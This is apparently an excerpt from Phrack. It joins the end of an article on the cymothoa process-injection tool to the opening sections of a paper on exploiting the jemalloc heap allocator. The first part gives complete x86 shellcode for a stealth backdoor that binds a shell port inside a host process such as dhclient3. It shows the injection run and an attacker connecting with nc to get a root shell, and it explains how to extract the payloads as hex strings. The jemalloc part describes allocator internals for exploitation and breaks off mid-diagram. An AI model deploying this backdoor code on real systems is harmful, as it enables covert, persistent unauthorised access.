%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

#
# Single process backdoor (alarm preamble)
#

handler:
	pusha

set_signal_handler:
	# signal(SIGALRM, handler)
	xorl	%eax, %eax
	xorl	%ebx, %ebx
	mov	$48, %al
	mov	$14, %bl
	jmp	set_signal_handler_end
load_handler:
	pop	%ecx
	subl	$0x18, %ecx # adjust %ecx to point handler()
	int	$0x80
	jmp	shellcode

set_signal_handler_end:
	call load_handler

shellcode:
	# check if already initialized
	mov     $0x4d454d50, %esi  # replaced by the injector
                                   # (persistent memory address)
	mov     (%esi), %eax
	cmp     $0xdeadbeef, %eax
	je      accept_call        # jump if already initialized

socket_call:
	# call to sys_socketcall($0x01 (socket), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $0x01, %bl
	jmp     socket_args
load_socket_args:
	pop     %ecx
	int     $0x80 # %eax = socket descriptor

	# save socket descriptor
	mov     $0xdeadbeef, %ebx
	mov     %ebx, (%esi)
	add     $4, %esi
	mov     %eax, (%esi)
	sub     $4, %esi
	jmp     fcntl_call

socket_args:
	call load_socket_args
	.long	0x02	# AF_INET
	.long	0x01	# SOCK_STREAM
	.long	0x00	# NULL

fcntl_call:
	# call to sys_fcntl(socket, F_GETFL)
	mov     %eax, %ebx
	xorl    %eax, %eax
	mov     $55, %al
	xorl    %ecx, %ecx
	mov     $3, %cl
	int     $0x80
	# call to sys_fcntl(socket, F_SETFL, flags | O_NONBLOCK)
	mov     %eax, %edx
	xorl    %eax, %eax
	mov     $55, %al
	mov     $4, %cl
	orl     $0x800, %edx  # O_NONBLOCK (nonblocking socket)
	int     $0x80

bind_call:
	# prepare sys_socketcall (bind) arguments
	jmp     struct_sockaddr
load_sockaddr:
	pop     %ecx
	push    $0x10   # sizeof(struct_sockaddr)
	push    %ecx    # struct_sockaddr address
	push    %ebx    # socket descriptor

	# call to sys_socketcall($0x02 (bind), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $0x02, %bl
	mov     %esp, %ecx
	int     $0x80
	jmp     listen_call

struct_sockaddr:
	call load_sockaddr
	.short	0x02	# AF_INET
	.short	0x5250	# PORT (replaced by the injector)
	.long	0x00	# INADDR_ANY

listen_call:
	pop     %eax    # socket descriptor
	pop     %ebx
	push    $0x10   # queue (backlog)
	push    %eax    # socket descriptor

	# call to sys_socketcall($0x04 (listen), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $0x04, %bl
	mov     %esp, %ecx
	int     $0x80

	# restore stack
	pop     %edi
	pop     %edi
	pop     %edi

accept_call:
	# prepare sys_socketcall (accept) arguments
	xorl    %ecx, %ecx
	push    %ecx         # socklen_t *addrlen
	push    %ecx         # struct sockaddr *addr
	add     $4, %esi
	push    (%esi)       # socket descriptor

	# call to sys_socketcall($0x05 (accept), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $0x05, %bl
	mov     %esp, %ecx
	int     $0x80       # %eax = file descriptor or negative (on error)
	mov     %eax, %edx  # save file descriptor

	# restore stack
	pop     %edi
	pop     %edi
	pop     %edi

	# check return value
	test    %eax, %eax
	js      schedule_next_and_return  # jump on error (negative %eax)


fork_child:
	# call to sys_fork()
	xorl    %eax, %eax
	mov     $2, %al
	int     $0x80

	test    %eax, %eax
	jz      dup2_multiple_calls  # child continue execution
	                             # parent schedule_next_and_return

schedule_next_and_return:

	# call to sys_close(socket file descriptor)
	# (since is used only by the child process)
	xorl    %eax, %eax
	mov     $6, %al
	mov     %edx, %ebx
	int     $0x80

	# call to sys_waitpid(-1, NULL, WNOHANG)
	# (to remove zombie processes)
	xorl    %eax, %eax
	mov     $7, %al
	xorl    %ebx, %ebx
	dec     %ebx
	xorl    %ecx, %ecx
	xorl    %edx, %edx
	mov     $1, %dl
	int     $0x80

	# alarm(timeout)
	xorl    %eax, %eax
	mov     $27, %al
	movl    $0x53434553, %ebx    # replaced by the injector (seconds)
	int     $0x80

	# return
	popa
	ret

dup2_multiple_calls:
	# dup2(socket, 2), dup2(socket, 1), dup2(socket, 0)
	xorl    %eax, %eax
	xorl    %ecx, %ecx
	mov     %edx, %ebx
	mov     $2, %cl
dup2_loop:
	mov     $63, %al
	int     $0x80
	dec     %ecx
	jns     dup2_loop

execve_call:
	# call to sys_execve(program, *args)
	xorl    %eax, %eax
	mov     $11, %al
	jmp     program_path
load_program_path:
	pop     %ebx
	# create argument list [program_path, NULL]
	xorl    %ecx, %ecx
	push    %ecx
	push    %ebx
	mov     %esp, %ecx
	mov	%esp, %edx
	int     $0x80

program_path:
	call load_program_path
	.ascii  "/bin/sh"

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

A little summary of the code:
1) Half preable, only the signal() part.
2) Check to see if it's the first execution. This step makes use of a
   persistent memory location, provided by the injector.
2.1) If already initialized jump to 7
2.2) If not initialized continue
3) Open socket.
4) Set nonblocking using fcntl().
5) Bind socket to the specified port.
6) Socket in listen mode with listen().
7) Check if a client is connected using accept().
7.1) No clients, jump to 9
7.2) Client connected, continue
8) Fork() a child process and execute a shell.
9) Set the timer and resume host execution
   (the second half of the preamble)

For this shellcode the provided arguments are a persistent memory
address, the port to listen on and the timer (in seconds).

Finally, let's see a practical example of use.

First, we must identify our host process. We need also to find a door is
not likely to arouse suspicion.

root@victim# lsof -a -i -c dhclient3
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
dhclient3 1232 root    5u  IPv4   4555      0t0  UDP *:bootpc
dhclient3 1612 root    4u  IPv4   4554      0t0  UDP *:bootpc

Here we can see two dhclient3 processes with port 68/UDP open (bootpc): a
good strategy for our backdoor is to listen on port 68/TCP...

root@victim# ./cymothoa -p 1612 -s 13 -j 1 -y 68
[+] attaching to process 1612

 register info:
 -----------------------------------------------------------
 eax value: 0xfffffdfe   ebx value: 0x6
 esp value: 0xbfff6dd0   eip value: 0xb7682430
 ------------------------------------------------------------

[+] new esp: 0xbfff6dcc
[+] injecting code into 0xb7683000
[+] copy general purpose registers
[+] persistent memory at 0xb769f000 (if used)
[+] detaching from 1612

[+] infected!!!

Let's see the result:

root@victim# lsof -a -i -c dhclient3
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
dhclient3 1232 root    5u  IPv4   4555      0t0  UDP *:bootpc
dhclient3 1612 root    4u  IPv4   4554      0t0  UDP *:bootpc
dhclient3 1612 root    7u  IPv4  21892      0t0  TCP *:bootpc (LISTEN)

As you can see it is very difficult to see that something is wrong...

Now the attacker can connect to the victim and get a shell:

root@attacker# nc -vv victim_ip 68
Connection to victim_ip 68 port [tcp/bootpc] succeeded!
uname -a
Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux

We have achieved our goal: a single process backdoor :)

------[ 6. Something about the injector

In all these examples we always used the injector cymothoa [3].
Some notes about this tool...

The injector is very important because it allows the customization of the
shellcode and its injection in the right areas of memory.

Cymothoa wants to be an aid to developing shellcode, in several ways.

In the payloads directory there are all the assembly sources created by the
author, easily compilable with gcc:

root@box# cd payloads
root@box# ls
clone_shellcode.s            fork_shellcode.s
scheduled_backdoor_alarm.s   mmx_example_shellcode.s
scheduled_setitimer.s        scheduled_alarm.s
scheduled_tail_setitimer.s
root@box# gcc -c scheduled_backdoor_alarm.s
root@box#

Cymothoa includes also some tools to easily extract the shellcode from
these object files.

For example bgrep [6], a binary grep, that allows to find the offset of
of particular hexadecimal sequences:

root@box# ./bgrep e8f0ffffff payloads/scheduled_backdoor_alarm.o
payloads/scheduled_backdoor_alarm.o: 0000014b

This is useful for finding the beginning of the code to extract.

Once you locate the beginning and the length of the code, you can easily
turn it into a C string with the script hexdump_to_cstring.pl.

root@box# hexdump -C -s 52 payloads/scheduled_backdoor_alarm.o -n 291 | \
          ./hexdump_to_cstring.pl
\x60\x31\xc0\x31\xdb\xb0\x30\xb3\x0e\xeb\x08\x59\x83\xe9\x18\xcd\x80\xeb
\x05\xe8\xf3\xff\xff\xff\xbe\x50\x4d\x45\x4d\x8b\x06\x3d\xef\xbe\xad\xde
\x0f\x84\x81\x00\x00\x00\x31\xc0\xb0\x66\x31\xdb\xb3\x01\xeb\x14\x59\xcd
...

Once this is done you can add this string to the file payloads.h, and
recompile cymothoa, to have a new, ready to inject, parasite.

If you want to transform into parasite code you already have available,
that's the easy way.

The last thing I want to mention about cymothoa, is a little utility
shipped with the main tool: a syscall code generator.

Writing syscall based shellcodes can be a tedious work, especially if
you must remember every syscall number and parameters.

Since I am a lazy person, I've written a script able to do part of
the hard work:

root@box# ./syscall_code.pl
Syscall shellcode generator
Usage:
        ./syscall_code.pl syscall

For example you can use it to generate the calling sequence for the
open syscall:

root@box# ./syscall_code.pl sys_open
sys_open_call:
        # call to sys_open(filename, flags, mode)
        xorl    %eax, %eax
        mov     $5, %al
        xorl    %ebx, %ebx
        mov     filename, %bl
        xorl    %ecx, %ecx
        mov     flags, %cl
        xorl    %edx, %edx
        mov     mode, %dl
        int     $0x80

As you can see the script generates assembly code that marks arguments and
corresponding registers of the syscall, as well as the call number.

The code is not always 100% reliable (e.g. some syscalls require complex
structures the script is not able to construct), but it can  greatly speed
up the shellcode development phase.

I hope you'll find it useful...

------[ 7. Further reading

While I was writing this article, on the defcon's website have been
published the talks which will take place during the next edition.

One of these caught my attention [7]:

     Jugaad - Linux Thread Injection Kit

   "... The kit currently works on Linux, allocates space inside
    a process and injects and executes arbitrary payload as a
    thread into that process. It utilizes the ptrace() functionality
    to manipulate other processes on the system. ptrace() is an API
    generally used by debuggers to manipulate(debug) a program.
    By using the same functionality to inject and manipulate the
    flow of execution of a program Jugaad is able to inject the
    payload as a thread."

I recommend all readers who have judged this article interesting, to follow
this talk, because it is a similar research, but parallel to mine.

My goal was to implement a stealth backdoor without creating new processes
or threads, while the research of Aseem focuses on the creation of threads,
to achieve the same level of stealthiness.

I therefore offer my best wishes to Aseem, since I think our works are
complementary.

For additional material on "injection of code" you can see the links
listed at the end of the document.

Bye bye ppl ;)

Greetings (in random order): emgent, scox, white_sheep (and all ihteam),
sugar, renaud, bt_smarto, cris.

------[ 8. Links and references

[0] https://secure.wikimedia.org/wikipedia/en/wiki/Ptrace
[1] http://dl.packetstormsecurity.net/papers/unix/elf-runtime-fixup.txt
[2] http://www.phrack.org/issues.html?issue=58&id=4#article
    (5 - The dynamic linker's dl-resolve() function)
[3] http://vxheavens.com/lib/vrn00.html#c42
[4] http://cymothoa.sourceforge.net/
[5] http://www.exploit-db.com/exploits/13388/
[6] http://debugmo.de/2009/04/bgrep-a-binary-grep/
[7] https://www.defcon.org/html/defcon-19/dc-19-speakers.html#Jakhar

------[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x0a of 0x13

|=-----------------------------------------------------------------------=|
|=-------------------=[ Pseudomonarchia jemallocum ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ The false kingdom of jemalloc, or ]=------------------|
|=-----------=[ On exploiting the jemalloc memory manager ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[    argp | huku    ]=------------------------=|
|=--------------------=[  {argp,huku}@grhack.net  ]=---------------------=|
|=-----------------------------------------------------------------------=|


--[ Table of contents

1 - Introduction
  1.1 - Thousand-faced jemalloc
2 - jemalloc memory allocator overview
  2.1 - Basic structures
    2.1.1 - Chunks (arena_chunk_t)
    2.1.2 - Arenas (arena_t)
    2.1.3 - Runs (arena_run_t)
    2.1.4 - Regions/Allocations
    2.1.5 - Bins (arena_bin_t)
    2.1.6 - Huge allocations
    2.1.7 - Thread caches (tcache_t)
    2.1.8 - Unmask jemalloc
  2.2 - Algorithms
3 - Exploitation tactics
  3.1 - Adjacent region corruption
  3.2 - Heap manipulation
  3.3 - Metadata corruption
    3.3.1 - Run (arena_run_t)
    3.3.2 - Chunk (arena_chunk_t)
    3.3.3 - Thread caches (tcache_t)
4 - A real vulnerability
5 - Future work
6 - Conclusion
7 - References
8 - Code

--[ 1 - Introduction

In this paper we investigate the security of the jemalloc allocator
in both theory and practice. We are particularly interested in the
exploitation of memory corruption bugs, so our security analysis will
be biased towards that end.

jemalloc is a userland memory allocator. It provides an implementation
for the standard malloc(3) interface for dynamic memory management. It
was written by Jason Evans (hence the 'je') for FreeBSD since there
was a need for a high performance, SMP-enabled memory allocator for
libc. After that, jemalloc was also used by the Mozilla Firefox browser
as its internal dedicated custom memory allocator.

All the above have led to a few versions of jemalloc that are very
similar but not exactly the same. To summarize, there are three different
widely used versions of jemalloc: 1) the standalone version [JESA],
2) the version in the Mozilla Firefox web browser [JEMF], and 3) the
FreeBSD libc [JEFB] version.

The exploitation vectors we investigate in this paper have been tested
on the jemalloc versions presented in subsection 1.1, all on the x86
platform. We assume basic knowledge of x86 and a general familiarity
with userland malloc() implementations, however these are not strictly
required.


----[ 1.1 - Thousand-faced jemalloc

There are so many different jemalloc versions that we almost went crazy
double checking everything in all possible platforms. Specifically, we
tested the latest standalone jemalloc version (2.2.3 at the time of this
writing), the version included in the latest FreeBSD libc (8.2-RELEASE),
and the Mozilla Firefox web browser version 11.0. Furthermore, we also
tested the Linux port of the FreeBSD malloc(3) implementation
(jemalloc_linux_20080828a in the accompanying code archive) [JELX].


--[ 2 - jemalloc memory allocator overview

The goal of this section is to provide a technical overview of the
jemalloc memory allocator. However, it is not all-inclusive. We will only
focus on the details that are useful for understanding the exploitation
attacks against jemalloc analyzed in the next section. The interested
reader can look in [JE06] for a more academic treatment of jemalloc
(including benchmarks, comparisons with other allocators, etc).

Before we start our analysis we would like to point out that jemalloc (as
well as other malloc implementations) does not implement concepts like
'unlinking' or 'frontlinking' which have proven to be catalytic for the
exploitation of dlmalloc and Microsoft Windows allocators. That said, we
would like to stress the fact that the attacks we are going to present do
not directly achieve a write-4-anywhere primitive. We, instead, focus on
how to force malloc() (and possibly realloc()) to return a chunk that will
most likely point to an already initialized memory region, in hope that
the region in question may hold objects important for the functionality
of the target application (C++ VPTRs, function pointers, buffer sizes and
so on). Considering the various anti-exploitation countermeasures present
in modern operating systems (ASLR, DEP and so on), we believe that such
an outcome is far more useful for an attacker than a 4 byte overwrite.

jemalloc, as a modern memory allocator should, recognizes that minimal
page utilization is no longer the most critical feature. Instead it
focuses on enhanced performance in retrieving data from the RAM. Based
on the principle of locality which states that items that are allocated
together are also used together, jemalloc tries to situate allocations
contiguously in memory. Another fundamental design choice of jemalloc is
its support for SMP systems and multi-threaded applications by trying
to avoid lock contention problems between many simultaneously running
threads. This is achieved by using many 'arenas' and the first time a
thread calls into the memory allocator (for example by calling malloc(3))
it is associated with a specific arena. The assignment of threads to
arenas happens with three possible algorithms: 1) with a simple hashing
on the thread's ID if TLS is available 2) with a simple builtin linear
congruential pseudo random number generator in case MALLOC_BALANCE is
defined and TLS is not available 3) or with the traditional round-robin
algorithm. For the later two cases, the association between a thread
and an arena doesn't stay the same for the whole life of the thread.

Continuing our high-level overview of the main jemalloc structures
before we dive into the details in subsection 2.1, we have the concept of
'chunks'. jemalloc divides memory into chunks, always of the same size,
and uses these chunks to store all of its other data structures (and
user-requested memory as well). Chunks are further divided into 'runs'
that are responsible for requests/allocations up to certain sizes. A run
keeps track of free and used 'regions' of these sizes. Regions are the
heap items returned on user allocations (e.g. malloc(3) calls). Finally,
each run is associated with a 'bin'. Bins are responsible for storing
structures (trees) of free regions.

The following diagram illustrates in an abstract manner the relationships
between the basic building blocks of jemalloc.

  Chunk #0                           Chunk #1
.--------------------------------. .--------------------------------.
|                                | |                                |
|   Run #0         Run #1        | |   Run #0         Run #1        |
| .-------------..-------------. | | .-------------..-------------. |
| |             ||             | | | |             ||             | |
| |   Page      ||   Page      | | | |   Page      ||   Page      | |
| | .---------. || .---------. | | | | .---------. || .---------. | |
| | |         | || |         | | | | | |         | || |         | | | ...
| | | Regions | || | Regions | | | | | | Regions | || | Regions | | |
| | |[] [] [] | || |[] [] [] | | | | | |[] [] [] | || |[] [] [] | | |
| | | ^     ^ | || |         | | | | | | ^     ^ | || |         | | |
| | `-|-----|-' || `---------' | | | | `-|-----|-' || `---------' | |
| `---|-----|---'`-------------' | | `---|-----|---'`-------------' |
`-----|-----|--------------------' `-----|-----|--------------------'
      |     |                            |     |
      |     |                            |     |
  .---|-----|----------.             .---|-----|----------.
  |   |     |          |             |   |     |          |
  | free regions' tree | ...         | free regions' tree | ...
  |                    |             |                    |
  `--------------------'             `--------------------'
  bin[Chunk #0][Run #0]              bin[Chunk #1][Run #0]


----[ 2.1 - Basic structures

In the following paragraphs we analyze in detail the basic jemalloc
structures. Familiarity with these structures is essential in order to
begin our understanding of the jemalloc internals and proceed to the
exploitation step.


------[ 2.1.1 - Chunks (arena_chunk_t)

If you are familiar with Linux heap exploitation (and more precisely with
dlmalloc internals) you have probably heard of the term 'chunk' before. In
dlmalloc, the term 'chunk' is used to denote the memory regions returned
by malloc(3) to the end user. We hope you get over it soon because when it
comes to jemalloc the term 'chunk' is used to describe big virtual memory
regions that the memory allocator conceptually divides available memory
into. The size of the chunk regions may vary depending on the jemalloc
variant used. For example, on FreeBSD 8.2-RELEASE, a chunk is a 1 MB region
(aligned to its size), while on the latest FreeBSD (in CVS at the time of
this writing) a jemalloc chunk is a region of size 2 MB. Chunks are the
highest abstraction used in jemalloc's design, that is the rest of the
structures described in the following paragraphs are actually placed within
a chunk somewhere in the target's memory.

The following are the chunk sizes in the jemalloc variants we have
examined:

                +---------------------------------------+
                | jemalloc variant         | Chunk size |
                +---------------------------------------+
                | FreeBSD 8.2-RELEASE      |    1 MB    |
                -----------------------------------------
                | Standalone v2.2.3        |    4 MB    |
                -----------------------------------------
                | jemalloc_linux_20080828a |    1 MB    |
                -----------------------------------------
                | Mozilla Firefox v5.0     |    1 MB    |
                -----------------------------------------
                | Mozilla Firefox v7.0.1   |    1 MB    |
                -----------------------------------------
                | Mozilla Firefox v11.0    |    1 MB    |
                -----------------------------------------

An area of jemalloc managed memory divided into chunks looks like the
following diagram. We assume a chunk size of 4 MB; remember that chunks are
aligned to their size. The address 0xb7000000 does not have a particular
significance apart from illustrating the offsets between each chunk.

+-------------------------------------------------------------------------+
|         Chunk alignment        |             Chunk content              |
+-------------------------------------------------------------------------+
| Chunk #1 starts at: 0xb7000000 [  Arena                                 ]
| Chunk #2 starts at: 0xb7400000 [  Arena                                 ]
| Chunk #3 starts at: 0xb7800000 [  Arena                                 ]
| Chunk #4 starts at: 0xb7c00000 [  Arena                                 ]
| Chunk #5 starts at: 0xb8000000 [  Huge allocation region, see below     ]
| Chunk #6 starts at: 0xb8400000 [  Arena                                 ]
| Chunk #7 starts at: 0xb8800000 [  Huge allocation region                ]
| Chunk #8 starts at: 0xb8c00000 [  Huge allocation region                ]
| Chunk #9 starts at: 0xb9000000 [  Arena                                 ]
+-------------------------------------------------------------------------+

Huge allocation regions are memory regions managed by jemalloc chunks that 
satisfy huge malloc(3) requests. Apart from the huge size class, jemalloc 
also has the small/medium and large size classes for end user allocations 
(both managed by arenas). We analyze jemalloc's size classes of regions in 
subsection 2.1.4.

Chunks are described by 'arena_chunk_t' structures (taken from the
standalone version of jemalloc; we have added and removed comments in
order to make things more clear):


[2-1]

typedef struct arena_chunk_s arena_chunk_t;
struct arena_chunk_s
{
    /* The arena that owns this chunk. */
    arena_t *arena;

    /* A list of the corresponding arena's dirty chunks. */
    ql_elm(arena_chunk_t) link_dirty;

    /* 
     * Whether this chunk contained at some point one or more dirty pages.
     */
    bool dirtied;

    /* This chunk's number of dirty pages. */
    size_t ndirty;

    /*
     * A chunk map element corresponds to a page of this chunk. The map
     * keeps track of free and large/small regions.
     */
    arena_chunk_map_t map[];
};


The main use of chunk maps in combination with the memory alignment of the
chunks is to enable constant time access to the management metadata of free
and large/small heap allocations (regions).


------[ 2.1.2 - Arenas (arena_t)

An arena is a structure that manages the memory areas jemalloc divides
into chunks. Arenas can span more than one chunk, and depending on the
size of the chunks, more than one page as well. As we have already
mentioned, arenas are used to mitigate lock contention problems between
threads. Therefore, allocations and deallocations from a thread always
happen on the same arena. Theoretically, the number of arenas is in direct
relation to the need for concurrency in memory allocation. In practice the
number of arenas depends on the jemalloc variant we deal with. For example,
in Firefox's jemalloc there is only one arena. In the case of single-CPU
systems there is also only one arena. In SMP systems the number of arenas
is equal to either two (in FreeBSD 8.2) or four (in the standalone variant)
times the number of available CPU cores. Of course, there is always at
least one arena.

Debugging the standalone variant with gdb:


gdb $ print ncpus
$86 = 0x4
gdb $ print narenas
$87 = 0x10


Arenas are the central jemalloc data structures as they are used to manage
the chunks (and the underlying pages) that are responsible for the small
and large allocation size classes. Specifically, the arena structure is
defined as follows:


[2-2]

typedef struct arena_s arena_t;
struct arena_s
{
    /* This arena's index in the arenas array. */
    unsigned ind;

    /* Number of threads assigned to this arena. */
    unsigned nthreads;

    /* Mutex to protect certain operations. */
    malloc_mutex_t lock;

    /*
     * Chunks that contain dirty pages managed by this arena. When jemalloc
     * requires new pages these are allocated first from the dirty pages.
     */
    ql_head(arena_chunk_t) chunks_dirty;

    /*
     * Each arena has a spare chunk in order to cache the most recently
     * freed chunk.
     */
    arena_chunk_t *spare;

    /* The number of pages in this arena's active runs. */
    size_t nactive;

    /* The number of pages in unused runs that are potentially dirty. */
    size_t ndirty;

    /* The number of pages this arena's threads are attempting to purge. */
    size_t npurgatory;

    /* 
     * Ordered tree of this arena's available clean runs, i.e. runs
     * associated with clean pages.
     */
    arena_avail_tree_t runs_avail_clean;

    /*
     * Ordered tree of this arena's available dirty runs, i.e. runs
     * associated with dirty pages.
     */
    arena_avail_tree_t runs_avail_dirty;

    /* 
     * Bins are used to store structures of free regions managed by this
     * arena.
     */
    arena_bin_t bins[];
};


All in all a fairly simple structure. As it is clear from the above
structure, the allocator contains a global array of arenas and an unsigned
integer representing the number of these arenas:


arena_t     **arenas;
unsigned    narenas;


And using gdb we can see the following:


gdb $ x/x arenas
0xb7800cc0: 0xb7800740
gdb $ print arenas[0]
$4 = (arena_t *) 0xb7800740
gdb $ x/x &narenas
0xb7fdfdc4 <narenas>:   0x00000010


At 0xb7800740 we have 'arenas[0]', that is the first arena, and at
0xb7fdfdc4 we have the number of arenas, i.e 16.


------[ 2.1.3 - Runs (arena_run_t)

Runs are further memory denominations of the memory divided by jemalloc
into chunks. Runs exist only for small and large allocations (see
subsection 2.1.1), but not for huge allocations. In essence, a chunk
is broken into several runs. Each run is actually a set of one or more
contiguous pages (but a run cannot be smaller than one page). Therefore,
they are aligned to multiples of the page size. The runs themselves may
be non-contiguous but they are as close as possible due to the tree search
heuristics implemented by jemalloc.

The main responsibility of a run is to keep track of the state (i.e. free
or used) of end user memory allocations, or regions as these are called in
jemalloc terminology. Each run holds regions of a specific size (however
within the small and large size classes as we have mentioned) and their
state is tracked with a bitmask. This bitmask is part of a run's metadata;
these metadata are defined with the following structure:


[2-3]

typedef struct arena_run_s arena_run_t;
struct arena_run_s
{
    /*
     * The bin that this run is associated with. See 2.1.5 for details on
     * the bin structures.
     */
    arena_bin_t *bin;
    
    /*
     * The index of the next region of the run that is free. On the FreeBSD
     * and Firefox flavors of jemalloc this variable is named regs_minelm.
     */
    uint32_t nextind;
    
    /* The number of free regions in the run. */
    unsigned nfree;

    /*
     * Bitmask for the regions in this run. Each bit corresponds to one
     * region. A 0 means the region is used, and an 1 bit value that the
     * corresponding region is free. The variable nextind (or regs_minelm
     * on FreeBSD and Firefox) is the index of the first non-zero element
     * of this array.
     */
    unsigned regs_mask[];
};


Don't forget to re-read the comments ;)


------[ 2.1.4 - Regions/Allocations

In jemalloc the term 'regions' applies to the end user memory areas
returned by malloc(3). As we have briefly mentioned earlier, regions are
divided into three classes according to their size, namely a) small/medium,
b) large and c) huge.

Huge regions are considered those that are bigger than the chunk size minus
the size of some jemalloc headers. For example, in the case that the chunk
size is 4 MB (4096 KB) then a huge region is an allocation greater than
4078 KB. Small/medium are the regions that are smaller than a page. Large
are the regions that are smaller than the huge regions (chunk size minus
some headers) and also larger than the small/medium regions (page size).

Huge regions have their own metadata and are managed separately from
small/medium and large regions. Specifically, they are managed by a
global to the allocator red-black tree and they have their own dedicated
and contiguous chunks. Large regions have their own runs, that is each
large allocation has a dedicated run. Their metadata are situated on
the corresponding arena chunk header. Small/medium regions are placed
on different runs according to their specific size. As we have seen in
2.1.3, each run has its own header in which there is a bitmask array
specifying the free and the used regions in the run.

In the standalone flavor of jemalloc the smallest run is that for regions
of size 4 bytes. The next run is for regions of size 8 bytes, the next
for 16 bytes, and so on.

When we do not mention it specifically, we deal with small/medium and
large region classes. We investigate the huge region size class separately
in subsection 2.1.6.


------[ 2.1.5 - Bins (arena_bin_t)

Bins are used by jemalloc to store free regions. Bins organize the free
regions via runs and also keep metadata about their regions, like for
example the size class, the total number of regions, etc. A specific bin 
may be associated with several runs, however a specific run can only be
associated with a specific bin, i.e. there is an one-to-many correspondence
between bins and runs. Bins have their associated runs organized in a tree.

Each bin has an associated size class and stores/manages regions of this
size class. A bin's regions are managed and accessed through the bin's
runs. Each bin has a member element representing the most recently used run
of the bin, called 'current run' with the variable name runcur. A bin also
has a tree of runs with available/free regions. This tree is used when the
current run of the bin is full, that is it doesn't have any free regions.

A bin structure is defined as follows:


[2-4]

typedef struct arena_bin_s arena_bin_t;
struct arena_bin_s
{
    /*
     * Operations on the runs (including the current run) of the bin
     * are protected via this mutex.
     */
    malloc_mutex_t lock;

    /*
     * The current run of the bin that manages regions of this bin's size
     * class.
     */
    arena_run_t *runcur;

    /*
     * The tree of the bin's associated runs (all responsible for regions
     * of this bin's size class of course).
     */
    arena_run_tree_t runs;

    /* The size of this bin's regions. */
    size_t reg_size;
    
    /*
     * The total size of a run of this bin. Remember that each run may be
     * comprised of more than one pages.
     */
    size_t run_size;
    
    /* The total number of regions in a run of this bin. */
    uint32_t nregs;
    
    /*
     * The total number of elements in the regs_mask array of a run of this
     * bin. See 2.1.3 for more information on regs_mask.
     */
    uint32_t regs_mask_nelms;
    
    /*
     * The offset of the first region in a run of this bin. This can be 
     * non-zero due to alignment requirements.
     */
    uint32_t reg0_offset;
};


As an example, consider the following three allocations and that the
jemalloc flavor under investigation has 2 bytes as the smallest possible
allocation size (file test-bins.c in the code archive, example run on
FreeBSD):


one = malloc(2);
two = malloc(8);
three = malloc(16);


Using gdb let's explore jemalloc's structures. First let's see the runs
that the above allocations created in their corresponding bins:


gdb $ print arenas[0].bins[0].runcur
$25 = (arena_run_t *) 0xb7d01000
gdb $ print arenas[0].bins[1].runcur
$26 = (arena_run_t *) 0x0
gdb $ print arenas[0].bins[2].runcur
$27 = (arena_run_t *) 0xb7d02000
gdb $ print arenas[0].bins[3].runcur
$28 = (arena_run_t *) 0xb7d03000
gdb $ print arenas[0].bins[4].runcur
$29 = (arena_run_t *) 0x0


Now let's see the size classes of these bins:


gdb $ print arenas[0].bins[0].reg_size
$30 = 0x2
gdb $ print arenas[0].bins[1].reg_size
$31 = 0x4
gdb $ print arenas[0].bins[2].reg_size
$32 = 0x8
gdb $ print arenas[0].bins[3].reg_size
$33 = 0x10
gdb $ print arenas[0].bins[4].reg_size
$34 = 0x20


We can see that our three allocations of sizes 2, 8 and 16 bytes resulted
in jemalloc creating runs for these size classes. Specifically, 'bin[0]'
is responsible for the size class 2 and its current run is at 0xb7d01000,
'bin[1]' is responsible for the size class 4 and doesn't have a current
run since no allocations of size 4 were made, 'bin[2]' is responsible
for the size class 8 with its current run at 0xb7d02000, and so on. In the
code archive you can find a Python script for gdb named unmask_jemalloc.py
for easily enumerating the size of bins and other internal information in
the various jemalloc flavors (see 2.1.8 for a sample run).

At this point we should mention that in jemalloc an allocation of zero
bytes (that is a malloc(0) call) will return a region of the smallest size
class; in the above example a region of size 2. The smallest size class
depends on the flavor of jemalloc. For example, in the standalone flavor it
is 4 bytes.

The following diagram summarizes our analysis of jemalloc up to this point:

   .----------------------------------.       .---------------------------.
 .----------------------------------. |    +--+-----> arena_chunk_t       |
.---------------------------------. | |    |  |                           |
|             arena_t             | | |    |  |  .---------------------.  |
|                                 | | |    |  |  |                     |  |
| .--------------------.          | | |    |  |  |     arena_run_t     |  |
| | arena_chunk_t list |-----+    | | |    |  |  |                     |  |
| `--------------------'     |    | | |    |  |  |    .-----------.    |  |
|                            |    | | |    |  |  |    |   page    |    |  |
|   arena_bin_t bins[];      |    | | |    |  |  |    +-----------+    |  |
| .------------------------. |    | | |    |  |  |    |  region   |    |  |
| | bins[0]  ...  bins[27] | |    | | |    |  |  |    +-----------+    |  |
| `------------------------' |    | |.'    |  |  |    |  region   |    |  |
|     |                      |    |.'      |  |  |    +-----------+    |  |
`-----+----------------------+----'        |  |  |    |  region   |    |  |
      |                      |             |  |  |    +-----------+    |  |
      |                      |             |  |  |        . . .        |  |
      |                      v             |  |  |    .-----------.    |  |
      |            .-------------------.   |  |  |    |   page    |    |  |
      |            | .---------------. |   |  |  |    +-----------+    |  |
      |            | | arena_chunk_t |-+---+  |  |    |  region   |    |  |
      |            | `---------------' |      |  |    +-----------+    |  |
      |     [2-5]  | .---------------. |      |  |    |  region   |    |  |
      |            | | arena_chunk_t | |      |  |    +-----------+    |  |
      |            | `---------------' |      |  |    |  region   |    |  |
      |            |       . . .       |      |  |    +-----------+    |  |
      |            | .---------------. |      |  |                     |  |
      |            | | arena_chunk_t | |      |  `---------------------'  |
      |            | `---------------' |      |          [2-6]            |
      |            |       . . .       |      |  .---------------------.  |
      |            `-------------------'      |  |                     |  |
      |                                  +----+--+---> arena_run_t     |  |
